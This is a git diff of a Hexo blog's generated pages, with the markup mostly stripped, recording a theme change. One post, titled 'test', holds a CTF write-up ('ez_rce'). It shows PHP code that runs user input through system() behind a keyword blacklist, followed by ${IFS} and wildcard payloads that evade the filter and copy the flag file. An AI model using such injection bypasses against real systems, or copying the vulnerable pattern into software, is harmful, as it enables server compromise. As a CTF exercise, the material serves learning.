diff --git a/2023/10/24/hello-world/index.html b/2023/10/24/hello-world/index.html index cd0615d..94b5b4b 100644 --- a/2023/10/24/hello-world/index.html +++ b/2023/10/24/hello-world/index.html @@ -1,173 +1,435 @@ - - + + + - + + + + + + + + + + + + + + Hello World | harmor's blog - - - - - - - - - - - - + + + - - - - - + - + + + + + + + + + + + + + + - + + + + -
- -
-
-

LOADING

-

加载过慢请开启缓存 浏览器默认开启

- -
+ + + + + + +
+
+
+
+
+

Hello World

+
+
- -
+
+
+ + + + +
+ + +
+
+ +
+
+ - - - - -
-
-
-

Hello World

-
-
- - - - - 2023/10/24 - +
+
+ + -
- -
-

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

+ + + + +
+
+

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

Quick Start

Create a new post

1
$ hexo new "My New Post"

More info: Writing

@@ -182,50 +444,1002 @@

Deployment

image-20231024202739277

+ +

+
+ + + +
+ +
+ + + 文章作者: + + + + harmor + +
+ +
+ + + 版权声明: + + + + 本博客所有文章除特別声明外,均采用 + CC BY 4.0 + 许可协议。转载请注明来源 + harmor + ! + +
+ +
+ + + + + +
+ +
+ +
+ + + + + + + + +
+ +
+
+ +
+ + + + +
+ + + + +
+ + + + + + + + +
+
+ + 评论 +
+
+
+
+ + + + + -
- + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+
  目录
+
+
+
+ + + + + + + + + + + +
+ + + + +
+ + + +
+ +
+ + +
+
+ + + + + + +
+
+ Copyright © + + + 2023 + + harmor + | Powered by Hexo + | Theme Matery + + | 繁/简: + +
+ +   站点总字数: 404 + + + + + + + + + 本站总访问量 + + + + + + 人次, 访客数 人. + + +
+ + + +
+ +
+ +
+
+ +
+ + + + + + + + + + + + +
+
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/2023/10/24/test/index.html b/2023/10/24/test/index.html index 844f695..3f80575 100644 --- a/2023/10/24/test/index.html +++ b/2023/10/24/test/index.html @@ -1,173 +1,435 @@ - - + + + - + + + + + + + + + + + + + + test | harmor's blog - - - - - - - - - - - - + + + - - - - - + - + + + + + + + + + + + + + + - + + + + -
- -
-
-

LOADING

-

加载过慢请开启缓存 浏览器默认开启

- -
+ + + + + + +
+
+
+
+
+

test

+
+
- -
+
+
+ + + + +
+ + +
+
+ +
+
+ - - - - -
-
-
-

test

-
-
- - - - - 2023/10/24 - +
+
+ + + + + -
- -
-

1.ez_rce

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

$rce = $_GET['rce'];
if (isset($rce)) {
if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
system($rce);
}else {
echo "hhhhhhacker!!!"."\n";
}
} else {
highlight_file(__FILE__);
}

+ +
+
+

1.ez_rce

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

$rce = $_GET['rce'];
if (isset($rce)) {
if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
system($rce);
}else {
echo "hhhhhhacker!!!"."\n";
}
} else {
highlight_file(__FILE__);
}

1
2
3
4
5
6
7
8
9
10
11
?rce=ls  #有flag.php
?rce=cp${IFS}fla?.php${IFS}a.txt

<?php
$flag = getenv('GZCTF_FLAG');
if($flag=="not_flag" or $flag==""){
$flag="dzctf{test_flag}";
} #假的flag

?rce=ls${IFS}/ #有flag
?rce=cp${IFS}/fla?${IFS}a.php #然后url/a.php 可得flag
@@ -184,50 +446,1003 @@

PHP] strpos stripos strrpos strripos的区别-CSDN博客

+ +

+
+ + + +
+ +
+ + + 文章作者: + + + + harmor + +
+ +
+ + + 版权声明: + + + + 本博客所有文章除特別声明外,均采用 + CC BY 4.0 + 许可协议。转载请注明来源 + harmor + ! + +
+ +
+ + + + + +
+ +
+ +
+ + + + + + + + +
+ +
+
+ +
+ + + + +
+ + + + +
+ + + + + + + + +
+
+ + 评论 +
+
+
+
+ + + + + + + + + -
- + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+
  目录
+
+
+
+ + + + + + + + + + + +
+ + + + +
+ + + +
+ +
+ +
- +
+ + + + + +
+
+ Copyright © + + + 2023 + + harmor + | Powered by Hexo + | Theme Matery + + | 繁/简: + +
+ +   站点总字数: 404 + + + + + + + + + 本站总访问量 + + + + + + 人次, 访客数 人. + + +
+ + + +
+ +
+ +
+
+ +
+ + + + + + + + + + + + +
+
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/404.html b/404.html index b150f80..6b3189b 100644 --- a/404.html +++ b/404.html @@ -1,217 +1,805 @@ - - + + + - + + + + + + + + + + + + + + 404 | harmor's blog - - - - - - - - - - - - + + + - - - - - + - + + + + + + + + + + + + + + - + + + + -
- -
-
-

LOADING

-

加载过慢请开启缓存 浏览器默认开启

- -
+ + + +
+
+
+
+
+
+ 404 Sorry 您找的页面不存在!
- - - - - - - - -
-
-
-

404

+
-
- - - - - 2018/9/30 - +
+ + + + + + +